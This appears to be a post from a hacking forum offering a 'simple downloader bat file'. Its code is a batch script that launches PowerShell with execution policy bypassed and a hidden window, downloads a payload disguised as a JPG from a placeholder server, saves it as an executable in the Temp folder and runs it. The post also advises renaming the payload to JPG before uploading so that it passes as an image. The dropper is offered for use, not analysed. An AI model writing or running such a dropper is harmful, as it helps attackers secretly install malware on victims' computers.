13 Years of Service
100%
Please note, if you want to make a deal with this user, that it is blocked.
This its a simple downloader bat file , it use powershell!
Before upload your file , rename it , make it JPG file !
[HIDE-THANKS]
[/HIDE-THANKS]
Before upload your file , rename it , make it JPG file !
[HIDE-THANKS]
Code:
>@echo off
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://hostdirect/yourserver.jpg','%Temp%\yourserver.exe');Start-Process '%TEMP%\yourserver.exe'
